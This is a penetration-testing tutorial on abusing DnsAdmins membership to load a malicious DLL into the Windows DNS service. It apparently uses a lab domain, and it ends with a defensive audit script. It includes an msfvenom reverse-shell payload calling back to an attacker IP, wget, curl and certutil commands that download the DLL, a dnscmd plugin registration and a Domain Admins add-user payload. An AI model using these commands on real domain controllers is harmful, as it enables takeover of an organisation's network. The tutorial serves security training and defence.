## Description

Users who are members of the group **DnsAdmins** can abuse a feature of the Microsoft DNS management protocol to make the DNS server load any DLL they specify. The DNS service, which ends up executing the DLL, runs in the context of SYSTEM, and because DNS usually runs on a Domain Controller this can be used to gain Domain Administrator privileges.

## When can it be abused?

Once in an AD environment you can check whether a user is in the group **DnsAdmins** (or the alias **DnsAdmins**) with the commands:

```batch
net user <username> /domain
```

```powershell
Get-ADGroupMember -Identity "DnsAdmins"
```

```powershell
# only if you have access as the user you are enumerating
whoami /groups
```

If the output is as follows:

```powershell
*Evil-WinRM* PS C:\Users\ryan\Desktop> Get-ADGroupMember -Identity "DnsAdmins"

distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name              : Contractors
objectClass       : group
objectGUID        : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName    : Contractors
SID               : S-1-5-21-1392959593-3013219662-3596683436-1103
```

or

```powershell
*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
```

Then you can abuse this privilege!

## How can it be abused?

#### Creating the DLL with MSFVenom

Use Metasploit's "msfvenom" to create a malicious DLL that returns a reverse shell:

```shell
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.12 LPORT=1337 -f dll > pew.dll
```

#### Delivering the DLL

There are multiple ways to do this stage: host the DLL on your SMB server or a Python HTTP server, or if you have a shell in evil-winrm you can just upload the file.

###### SMB Server

Using the impacket scripts (**impacket-smbserver**) you can run your server with a named share and test whether you can reach it. Then from the target host you can use `net view` to connect and grab the DLL.

```shell
~ $ sudo impacket-smbserver testshare /home/kali/Desktop/test
```

You can then test whether it's up with the command:

```shell
~ $ smbclient -L //10.10.14.12/ -N
```

Replace **10.10.14.12** with your SMB server IP. To test whether the target is able to access your share you can run:

```powershell
PS C:\> net view \\10.10.14.12
```

###### Python HTTP Server

With the Python http.server module you can host the DLL file and download it on the target machine using common utilities.

**HOSTING**

```shell
~ $ sudo python3 -m http.server 80
```

**DOWNLOADING**

```powershell
# wget and curl are PowerShell aliases for Invoke-WebRequest; -OutFile writes the download to disk
wget http://10.10.14.12/pew.dll -OutFile pew.dll
curl http://10.10.14.12/pew.dll -OutFile pew.dll
certutil.exe -urlcache -f http://10.10.14.12/pew.dll pew.dll
```

###### Evil-WinRM

Just run the command `upload /path/to/pew.dll`:

```powershell
*Evil-WinRM* PS C:\Users\ryan\Desktop> upload /home/kali/Desktop/test/pew.dll
Info: Uploading pew.dll to C:\Users\ryan\Desktop\pew.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!
```

#### Execution

We now register the DLL as the DNS server's plugin DLL using dnscmd, which stores the path in the serverlevelplugindll registry property:

```powershell
dnscmd <FQDN of DC> /config /serverlevelplugindll /path/to/pew.dll
```

```powershell
*Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd test.vulnerable.local /config /serverlevelplugindll C:\Users\ryan\Desktop\pew.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
```

Now that the DLL is registered, the next step is to restart the DNS service so that it loads the DLL and returns the reverse shell:

```powershell
sc.exe stop dns
sc.exe start dns
```

This should trigger a reverse shell as administrator!

#### ALTERNATIVE EXECUTION

Alternatively, if a reverse shell is too much, you can just create a DLL that adds the user you have access to into the Domain Admins group. Below is the command to create the DLL:

```shell
msfvenom -p windows/x64/exec cmd='net group "Domain Admins" <user> /add /domain' --platform windows -f dll > pew.dll
```

I then upload it to the target host and attempt to execute it!

![](https://i.imgur.com/wmcfmHa.png)
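As an added defender-side example (not part of the original note), the PowerShell audit below checks the two things this technique depends on: who can reach the DnsAdmins group, including nested members like the Contractors group above, and whether a ServerLevelPluginDll value is currently set on the DNS server. It assumes it runs on the DNS server with the ActiveDirectory RSAT module installed; the function name and report fields are this example's own choices.

```powershell
# Added example, not part of the original note. Run on the DNS server (usually a DC)
# with the ActiveDirectory RSAT module available. Function name and report fields are
# this example's own choices, not a Microsoft API.
Import-Module ActiveDirectory -ErrorAction Stop

# dnscmd /config /serverlevelplugindll writes this registry value; the DNS service loads
# the named DLL as SYSTEM at start-up. The value is absent on a clean server.
$ParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsAdminsExposure {
    # 1. Everyone who can set the plugin DLL, including nested members
    #    (in the note, ryan is in DnsAdmins only through the Contractors group).
    $users = Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Select-Object -ExpandProperty SamAccountName

    # 2. Is a plugin DLL configured right now?
    $plugin = (Get-ItemProperty -Path $ParamsKey -Name 'ServerLevelPluginDll' `
        -ErrorAction SilentlyContinue).ServerLevelPluginDll

    $report = [ordered]@{
        DnsAdminsUsers            = @($users)
        ServerLevelPluginDll      = $plugin
        PluginFileExists          = $false
        PluginWritableByNonAdmins = $false
    }

    if ($plugin) {
        $report.PluginFileExists = Test-Path -LiteralPath $plugin
        if ($report.PluginFileExists) {
            # A legitimate plugin that non-admins can overwrite is as dangerous as an
            # attacker-chosen path, since the DLL is loaded as SYSTEM either way.
            $acl = Get-Acl -LiteralPath $plugin
            $report.PluginWritableByNonAdmins = [bool]($acl.Access | Where-Object {
                $_.FileSystemRights -match 'Write|Modify|FullControl' -and
                $_.IdentityReference.Value -notmatch 'SYSTEM|Administrators|TrustedInstaller'
            })
        }
    }
    [pscustomobject]$report
}

$result = Get-DnsAdminsExposure
$result | Format-List

# Remediation when the value is set and not expected: clear it, restart DNS so the
# service no longer loads the DLL, then review why the listed users are in DnsAdmins.
if ($result.ServerLevelPluginDll) {
    Write-Warning "ServerLevelPluginDll is set to '$($result.ServerLevelPluginDll)'"
    # Remove-ItemProperty -Path $ParamsKey -Name 'ServerLevelPluginDll'; Restart-Service DNS
}
```

Any account listed in DnsAdminsUsers should be treated as equivalent to a Domain Admin on that server until membership is trimmed.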